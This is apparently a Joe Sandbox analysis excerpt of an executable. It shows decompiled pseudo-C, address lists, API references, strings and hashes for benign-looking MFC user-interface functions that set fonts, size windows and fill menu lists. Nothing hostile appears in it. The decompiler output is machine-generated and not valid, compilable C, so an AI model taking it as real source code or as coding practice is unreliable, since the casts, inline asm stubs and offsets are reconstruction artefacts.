0x0040e2f0
0x0040e2f2
0x0040e2f8
0x0040e2f8
0x0040e300
0x0040e303
0x0040e308
0x0040e30f
0x0040e31a
0x0040e322

APIs

__EH_prolog.LIBCMT ref: 0040E1FC
#470.MFC42 ref: 0040E20D
strcmp.MSVCRT ref: 0040E222
GetParent.USER32(?), ref: 0040E230
#2864.MFC42(00000000), ref: 0040E237

Part of subcall function 0040CD41: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040CD4A
Part of subcall function 0040CD41: #2860.MFC42(00000000), ref: 0040CD51

#5788.MFC42(00000000,00000000), ref: 0040E24B
CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,Arial), ref: 0040E276
#1641.MFC42(00000000), ref: 0040E27F
#5788.MFC42(?,00000000), ref: 0040E291
#540.MFC42(00000000), ref: 0040E29C
#3874.MFC42(?,00000000), ref: 0040E2AB
#6172.MFC42(?,?,00000000), ref: 0040E2B6
#5875.MFC42(00000001,?,?,00000000), ref: 0040E2C0
GetClientRect.USER32 ref: 0040E2CC
#5788.MFC42(?), ref: 0040E2F8
#800.MFC42(?), ref: 0040E303
#755.MFC42(?), ref: 0040E30F

Strings

Arial, xrefs: 0040E25E

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #5788$#1641#2860#2864#3874#470#540#5875#6172#755#800ClientCreateFontH_prologMessageParentRectSendstrcmp
String ID: Arial
API String ID: 869321981-493054409
Opcode ID: 64f44c05090a5ce93d35d48ea254e1ae060c4c7c0aca2a41495d4509b328e26c
Instruction ID: 9d24cc71ab2be486ceef0cba926b899b44a0bbd512ae11decd882465e5142d6b
Opcode Fuzzy Hash: 64f44c05090a5ce93d35d48ea254e1ae060c4c7c0aca2a41495d4509b328e26c
Instruction Fuzzy Hash: 67314C71901209AFEF24EBA6D9859AEBBB8EB44308F10156EF102A31D2DB745E44CA65

Uniqueness

Uniqueness Score: -1.00%

Function 0041A108, Relevance: 31.5, APIs: 6, Strings: 12, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041A108(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x0041a108
0x0041a112
0x0041a117
0x0041a121
0x0041a126
0x0041a130
0x0041a135
0x0041a13f
0x0041a144
0x0041a14e
0x0041a153
0x0041a15d
0x0041a162

APIs

#537.MFC42(None,0041A103), ref: 0041A112
#537.MFC42(User defined,None,0041A103), ref: 0041A121
#537.MFC42(Open,User defined,None,0041A103), ref: 0041A130
#537.MFC42(Print,Open,User defined,None,0041A103), ref: 0041A13F
#537.MFC42(Explore,Print,Open,User defined,None,0041A103), ref: 0041A14E
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041A103), ref: 0041A15D

Strings

0TE, xrefs: 0041A10D
Open, xrefs: 0041A126
4TE, xrefs: 0041A11C
E-mail, xrefs: 0041A153
<TE, xrefs: 0041A13A
@TE, xrefs: 0041A149
DTE, xrefs: 0041A158
Explore, xrefs: 0041A144
Print, xrefs: 0041A135
User defined, xrefs: 0041A117
8TE, xrefs: 0041A12B
None, xrefs: 0041A108

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: 0TE$4TE$8TE$<TE$@TE$DTE$E-mail$Explore$None$Open$Print$User defined
API String ID: 4256512136-32927017
Opcode ID: 092ffe6f372c828e82e7bffaf58c654d7a7c9826ba7a7431bb73b3de8e081e94
Instruction ID: 73e4406fa2772d6a1ec696d3d4fda1fab40ea0f81ae6f5fab2559b83371fe6ac
Opcode Fuzzy Hash: 092ffe6f372c828e82e7bffaf58c654d7a7c9826ba7a7431bb73b3de8e081e94
Instruction Fuzzy Hash: E5D0AC00F81D419545187E51E433B3D5842CB9D7CBBE1A25F7D451E1D38E5C5A9C452E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1F3, Relevance: 31.5, APIs: 6, Strings: 12, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040D1F3(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x0040d1f3
0x0040d1fd
0x0040d202
0x0040d20c
0x0040d211
0x0040d21b
0x0040d220
0x0040d22a
0x0040d22f
0x0040d239
0x0040d23e
0x0040d248
0x0040d24d

APIs

#537.MFC42(None,0040D1EE), ref: 0040D1FD
#537.MFC42(User defined,None,0040D1EE), ref: 0040D20C
#537.MFC42(Open,User defined,None,0040D1EE), ref: 0040D21B
#537.MFC42(Print,Open,User defined,None,0040D1EE), ref: 0040D22A
#537.MFC42(Explore,Print,Open,User defined,None,0040D1EE), ref: 0040D239
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,0040D1EE), ref: 0040D248

Strings

,SE, xrefs: 0040D1F8
@SE, xrefs: 0040D243
Open, xrefs: 0040D211
E-mail, xrefs: 0040D23E
0SE, xrefs: 0040D207
8SE, xrefs: 0040D225
<SE, xrefs: 0040D234
Explore, xrefs: 0040D22F
Print, xrefs: 0040D220
4SE, xrefs: 0040D216
User defined, xrefs: 0040D202
None, xrefs: 0040D1F3

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: ,SE$0SE$4SE$8SE$<SE$@SE$E-mail$Explore$None$Open$Print$User defined
API String ID: 4256512136-2608041025
Opcode ID: c38da603a23d79d850e4ec713ec52a7e9ddcf9d635fe74a6752e337ccf4452fe
Instruction ID: c869f87ddccfd343abebd6a45f73851d49436e38d67775af8096dd2795011197
Opcode Fuzzy Hash: c38da603a23d79d850e4ec713ec52a7e9ddcf9d635fe74a6752e337ccf4452fe
Instruction Fuzzy Hash: 14D0B200F41E44E145147FA5E43793D5842CB9C7C7BA1A15F7D451E1D38DDC5A1C852D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B35A, Relevance: 31.5, APIs: 6, Strings: 12, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041B35A(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x0041b35a
0x0041b364
0x0041b369
0x0041b373
0x0041b378
0x0041b382
0x0041b387
0x0041b391
0x0041b396
0x0041b3a0
0x0041b3a5
0x0041b3af
0x0041b3b4

APIs

#537.MFC42(None,0041B355), ref: 0041B364
#537.MFC42(User defined,None,0041B355), ref: 0041B373
#537.MFC42(Open,User defined,None,0041B355), ref: 0041B382
#537.MFC42(Print,Open,User defined,None,0041B355), ref: 0041B391
#537.MFC42(Explore,Print,Open,User defined,None,0041B355), ref: 0041B3A0
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041B355), ref: 0041B3AF

Strings

pTE, xrefs: 0041B39B
Open, xrefs: 0041B378
lTE, xrefs: 0041B38C
E-mail, xrefs: 0041B3A5
tTE, xrefs: 0041B3AA
dTE, xrefs: 0041B36E
hTE, xrefs: 0041B37D
Explore, xrefs: 0041B396
Print, xrefs: 0041B387
User defined, xrefs: 0041B369
`TE, xrefs: 0041B35F
None, xrefs: 0041B35A

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$None$Open$Print$User defined$`TE$dTE$hTE$lTE$pTE$tTE
API String ID: 4256512136-3079219102
Opcode ID: 69a47cede2d03b0bb6efc366654952fd9a8a0d7b37d0343ff3d1d3a4531b9625
Instruction ID: 1a735a580a868a8322fc040d4fc904d58654d3212fd4202c163a39e7178dc815
Opcode Fuzzy Hash: 69a47cede2d03b0bb6efc366654952fd9a8a0d7b37d0343ff3d1d3a4531b9625
Instruction Fuzzy Hash: 60D06200F80E405109187E51E43373D4842C79D7CB794A21F7D421E1C38D4C0A5DC92E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C88B, Relevance: 30.2, APIs: 20, Instructions: 196
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040C88B(void* __ecx) {
				void* _t88;
				struct HWND__* _t89;
				struct HDC__* _t94;
				void* _t95;
				struct tagSIZE _t104;
				signed char _t106;
				struct HWND__* _t110;
				void* _t115;
				void* _t140;
				struct tagSIZE* _t161;
				signed char _t165;
				struct HDC__* _t169;
				void* _t171;
				void* _t174;

				_t88 = E0043E4E0(0x43fddc, _t174);
				_t140 = __ecx;
				_t89 = E0040CC69(_t88, __ecx);
				if(_t89 != 0) {
					_t89 = GetParent( *(_t140 + 0x20));
					_push(_t89);
					L0043DD9C();
					 *(_t174 - 0x20) = _t89;
					if(_t89 != 0) {
						if( *((intOrPtr*)(_t140 + 0xb0)) != 0) {
							GetWindowRect( *(_t140 + 0x20), _t174 - 0x1c);
							_push(_t174 - 0x1c);
							L0043E02A();
							L0043DDD8();
							_push(_t174 - 0x24);
							 *(_t174 - 4) = 0;
							L0043E19E();
							_t94 = GetDC( *(_t140 + 0x20));
							_push(_t94);
							L0043DD96();
							_t169 = _t94;
							_t95 = _t140 + 0x44;
							 *((intOrPtr*)(_t174 - 0x28)) = 0;
							if(_t95 != 0 &&  *((intOrPtr*)(_t95 + 4)) != 0) {
								 *((intOrPtr*)(_t174 - 0x28)) =  *((intOrPtr*)(_t169->i + 0x30))(_t95);
							}
							_t161 = _t174 - 0x38;
							GetTextExtentPoint32A( *(_t169 + 8),  *(_t174 - 0x24),  *( *(_t174 - 0x24) - 8), _t161);
							_t165 =  *(_t174 - 0x34);
							 *(_t174 - 0x30) =  *(_t174 - 0x38);
							if( *((intOrPtr*)(_t174 - 0x28)) != 0) {
								 *((intOrPtr*)(_t169->i + 0x30))( *((intOrPtr*)(_t174 - 0x28)));
							}
							ReleaseDC( *(_t140 + 0x20),  *(_t169 + 4));
							GetClientRect( *( *(_t174 - 0x20) + 0x20), _t174 - 0x48);
							_t104 =  *((intOrPtr*)(_t174 - 0x40)) -  *(_t174 - 0x48);
							if( *(_t174 - 0x38) > _t104) {
								 *(_t174 - 0x30) = _t104;
							}
							_t106 =  *((intOrPtr*)(_t174 - 0x3c)) -  *((intOrPtr*)(_t174 - 0x44));
							if(_t165 > _t106) {
								_t165 = _t106;
							}
							L0043E18C();
							 *(_t174 - 0x20) = _t106;
							if((_t106 & 0x00000002) == 0) {
								 *((intOrPtr*)(_t174 - 0x10)) =  *((intOrPtr*)(_t174 - 0x18)) + _t165;
							} else {
								asm("cdq");
								InflateRect(_t174 - 0x1c, 0,  ~( *((intOrPtr*)(_t174 - 0x10)) -  *((intOrPtr*)(_t174 - 0x18)) - _t165 - _t161 >> 1));
							}
							if(( *(_t174 - 0x20) & 0x00000001) == 0) {
								if(( *(_t174 - 0x20) & 0x00000002) == 0) {
									 *((intOrPtr*)(_t174 - 0x14)) =  *(_t174 - 0x30) +  *(_t174 - 0x1c);
								} else {
									 *(_t174 - 0x1c) =  *((intOrPtr*)(_t174 - 0x14)) -  *(_t174 - 0x30);
								}
							} else {
								asm("cdq");
								InflateRect(_t174 - 0x1c,  ~( *((intOrPtr*)(_t174 - 0x14)) -  *(_t174 - 0x30) -  *(_t174 - 0x1c) - _t161 >> 1), 0);
							}
							 *(_t174 - 4) =  *(_t174 - 4) | 0xffffffff;
							L0043DD36();
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
						_t171 = _t140 + 0x54;
						if(_t171 != 0) {
							_t110 =  *(_t171 + 0x20);
						} else {
							_t110 = 0;
						}
						if(IsWindow(_t110) != 0) {
							_push(1);
							_t115 = _t174 - 0x174;
							_push(_t140);
							_push(_t115);
							L0043E198();
							if(_t115 != 0) {
								 *((intOrPtr*)(_t174 - 0x164)) = 0;
								 *((intOrPtr*)(_t174 - 0x160)) = 0;
								 *((intOrPtr*)(_t174 - 0x15c)) =  *((intOrPtr*)(_t174 - 0x14)) -  *(_t174 - 0x1c);
								 *((intOrPtr*)(_t174 - 0x158)) =  *((intOrPtr*)(_t174 - 0x10)) -  *((intOrPtr*)(_t174 - 0x18));
								SendMessageA( *(_t140 + 0x74), 0x409, 0, _t174 - 0x174);
							}
						}
						_push(4);
						_push( *((intOrPtr*)(_t174 - 0x10)) -  *((intOrPtr*)(_t174 - 0x18)));
						_t89 =  *((intOrPtr*)(_t174 - 0x14)) -  *(_t174 - 0x1c);
						_push(_t89);
						_push( *((intOrPtr*)(_t174 - 0x18)));
						_push( *(_t174 - 0x1c));
						_push(0);
						L0043E0B4();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t174 - 0xc));
				return _t89;
			}

0x0040c890
0x0040c89c
0x0040c89f
0x0040c8a6
0x0040c8af
0x0040c8b5
0x0040c8b6
0x0040c8bd
0x0040c8c0
0x0040c8cf
0x0040c8ea
0x0040c8f6
0x0040c8f7
0x0040c8ff
0x0040c909
0x0040c90c
0x0040c90f
0x0040c917
0x0040c91d
0x0040c91e
0x0040c923
0x0040c925
0x0040c92a
0x0040c92d
0x0040c93c
0x0040c93c
0x0040c942
0x0040c94e
0x0040c95b
0x0040c95e
0x0040c961
0x0040c96a
0x0040c96a
0x0040c973
0x0040c983
0x0040c98c
0x0040c992
0x0040c994
0x0040c994
0x0040c99a
0x0040c99f
0x0040c9a1
0x0040c9a1
0x0040c9a5
0x0040c9b0
0x0040c9b6
0x0040c9d7
0x0040c9b8
0x0040c9c0
0x0040c9ce
0x0040c9ce
0x0040c9de
0x0040c9ff
0x0040ca14
0x0040ca01
0x0040ca07
0x0040ca07
0x0040c9e0
0x0040c9eb
0x0040c9f7
0x0040c9f7
0x0040ca17
0x0040ca1e
0x0040c8d1
0x0040c8da
0x0040c8db
0x0040c8dc
0x0040c8dd
0x0040c8dd
0x0040ca23
0x0040ca28
0x0040ca2e
0x0040ca2a
0x0040ca2a
0x0040ca2a
0x0040ca3a
0x0040ca3c
0x0040ca3e
0x0040ca44
0x0040ca45
0x0040ca48
0x0040ca4f
0x0040ca59
0x0040ca5f
0x0040ca65
0x0040ca71
0x0040ca87
0x0040ca87
0x0040ca4f
0x0040ca90
0x0040ca97
0x0040ca9b
0x0040ca9e
0x0040ca9f
0x0040caa2
0x0040caa5
0x0040caa7
0x0040caad
0x0040c8c0
0x0040cab2
0x0040caba

APIs

__EH_prolog.LIBCMT ref: 0040C890

Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D

GetParent.USER32(?), ref: 0040C8AF
#2864.MFC42(00000000,?,00000000), ref: 0040C8B6
GetWindowRect.USER32 ref: 0040C8EA
#6880.MFC42(?,?,?,00000000,?,00000000), ref: 0040C8F7
#540.MFC42(?,?,?,00000000,?,00000000), ref: 0040C8FF
#3874.MFC42(?,?,?,?,00000000,?,00000000), ref: 0040C90F
GetDC.USER32(?), ref: 0040C917
#2859.MFC42(00000000,?,?,00000000,?,00000000), ref: 0040C91E
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040C94E
ReleaseDC.USER32 ref: 0040C973
GetClientRect.USER32 ref: 0040C983
#3797.MFC42(?,?,00000000,?,00000000), ref: 0040C9A5
InflateRect.USER32(?,00000000,?), ref: 0040C9CE
InflateRect.USER32(?,?,00000000), ref: 0040C9F7
IsWindow.USER32(?), ref: 0040CA32
#3812.MFC42(?,?,00000001,?,?,00000000,?,00000000), ref: 0040CA48
SendMessageA.USER32(?,00000409,00000000,?), ref: 0040CA87
#6197.MFC42(00000000,?,?,?,?,00000004,?,?,00000000,?,00000000), ref: 0040CAA7

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Rect$#3797InflateWindow$#2859#2864#3812#3874#540#6197#6880ClientExtentH_prologMessageParentPoint32ReleaseSendText
String ID:
API String ID: 334588786-0
Opcode ID: e566932aaeddadd8b7e278e29096f1df490a5c410b4b706f2779c793297306d4
Instruction ID: cb9b05dac14e2db4ac9104f56948bafb3549abb0b68e2b757e785f41188b406e
Opcode Fuzzy Hash: e566932aaeddadd8b7e278e29096f1df490a5c410b4b706f2779c793297306d4
Instruction Fuzzy Hash: E971F9B1E0011ADFDF15DFA9C985AEEBBB5BF48300F14026AE905F7291DB38A941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00418B40, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 189
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00418B40(void* __ecx) {
				void* __esi;
				void* _t50;
				void* _t51;
				CHAR* _t56;
				long _t57;
				long _t58;
				intOrPtr* _t64;
				intOrPtr* _t71;
				intOrPtr* _t78;
				long _t83;
				void* _t90;
				int _t91;
				void* _t93;
				int _t94;
				void* _t96;
				int _t97;
				void* _t124;
				void* _t126;

				_t50 = E0043E4E0(0x440fe0, _t126);
				_t124 = __ecx;
				L0043DF94();
				_t83 = 1;
				_push(_t83);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(__ecx);
				_push(_t83);
				_t51 = L00404F47(_t50, __ecx + 0x174, __ecx);
				_push(_t83);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t124);
				_push(0x8006);
				L00404F47(_t51, _t124 + 0x1c8, _t124);
				memset(_t126 - 0x50, 0, 0x3c);
				 *(_t126 - 0x50) = 0x13;
				 *((intOrPtr*)(_t126 - 0x40)) = 0x2bc;
				 *(_t126 - 0x3b) = _t83;
				 *(_t126 - 0x39) = _t83;
				_t56 = lstrcpyA(_t126 - 0x34, "Arial");
				_push(0);
				_push("Arial");
				_push(0x64);
				L0043E2C4();
				_push(0x3f8);
				L0043E066();
				_t90 = _t124 + 0x444;
				if(_t90 != 0) {
					_t91 =  *(_t90 + 4);
				} else {
					_t91 = 0;
				}
				_t57 = SendMessageA(_t56[0x20], 0x30, _t91, _t83);
				_push(0x3f9);
				L0043E066();
				_t93 = _t124 + 0x444;
				if(_t93 != 0) {
					_t94 =  *(_t93 + 4);
				} else {
					_t94 = 0;
				}
				_t58 = SendMessageA( *(_t57 + 0x20), 0x30, _t94, _t83);
				_push(0x430);
				L0043E066();
				_t96 = _t124 + 0x444;
				if(_t96 != 0) {
					_t97 =  *(_t96 + 4);
				} else {
					_t97 = 0;
				}
				SendMessageA( *(_t58 + 0x20), 0x30, _t97, _t83);
				E0040C6ED(_t124 + 0x60, _t126 - 0x50);
				E0040CF63(_t124 + 0x60, 0xc08080, _t83);
				_t64 = E00429029(_t126 - 0x10, 0xe036);
				 *(_t126 - 4) = 0;
				E0040CF2E(_t124 + 0x60, 2,  *_t64, 0, 0, _t83, 0, 0);
				 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
				L0043DD36();
				 *((intOrPtr*)(_t126 - 0x40)) = 0x1f4;
				 *(_t126 - 0x50) = 0x10;
				E0040C6ED(_t124 + 0x330, _t126 - 0x50);
				E0040CF63(_t124 + 0x330, 0x323232, _t83);
				_t71 = E00429029(_t126 - 0x10, 0xe035);
				 *(_t126 - 4) = _t83;
				E0040CF2E(_t124 + 0x330, 2,  *_t71, 0, 0, _t83, 0, 0);
				 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
				L0043DD36();
				E0040C6ED(_t124 + 0x21c, _t126 - 0x50);
				E0040CF63(_t124 + 0x21c, 0x323232, _t83);
				_t78 = E00429029(_t126 - 0x14, 0xe026);
				 *(_t126 - 4) = 2;
				E0040CF2E(_t124 + 0x21c, 5,  *_t78, 0, 0, _t83, 0, 0);
				 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
				L0043DD36();
				_push(0x454574);
				_push(0x3f9);
				L0043E066();
				L0043E15C();
				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
				return _t83;
			}

0x00418b45
0x00418b50
0x00418b52
0x00418b5e
0x00418b65
0x00418b66
0x00418b6b
0x00418b70
0x00418b71
0x00418b72
0x00418b73
0x00418b78
0x00418b79
0x00418b7e
0x00418b83
0x00418b84
0x00418b85
0x00418b90
0x00418b9e
0x00418ba9
0x00418bb0
0x00418bbd
0x00418bc0
0x00418bc3
0x00418bc9
0x00418bca
0x00418bd5
0x00418bd7
0x00418bdc
0x00418be3
0x00418be8
0x00418bf0
0x00418bf6
0x00418bf2
0x00418bf2
0x00418bf2
0x00418c00
0x00418c06
0x00418c0d
0x00418c12
0x00418c1a
0x00418c20
0x00418c1c
0x00418c1c
0x00418c1c
0x00418c2a
0x00418c30
0x00418c37
0x00418c3c
0x00418c44
0x00418c4a
0x00418c46
0x00418c46
0x00418c46
0x00418c54
0x00418c61
0x00418c6f
0x00418c7d
0x00418c91
0x00418c94
0x00418c99
0x00418ca0
0x00418caf
0x00418cb6
0x00418cbd
0x00418cce
0x00418cdc
0x00418cf3
0x00418cf6
0x00418cfb
0x00418d02
0x00418d11
0x00418d22
0x00418d30
0x00418d37
0x00418d4e
0x00418d53
0x00418d5a
0x00418d5f
0x00418d64
0x00418d6b
0x00418d72
0x00418d7f
0x00418d87

APIs

__EH_prolog.LIBCMT ref: 00418B45
#4710.MFC42 ref: 00418B52
memset.MSVCRT ref: 00418B9E
lstrcpyA.KERNEL32(?,Arial), ref: 00418BC3
#2243.MFC42(00000064,Arial,00000000), ref: 00418BD7
#3092.MFC42(000003F8,00000064,Arial,00000000), ref: 00418BE3
SendMessageA.USER32(?,00000030,?,00000001), ref: 00418C00
#3092.MFC42(000003F9), ref: 00418C0D
SendMessageA.USER32(?,00000030,?,00000001), ref: 00418C2A
#3092.MFC42(00000430), ref: 00418C37
SendMessageA.USER32(?,00000030,?,00000001), ref: 00418C54
#800.MFC42 ref: 00418CA0
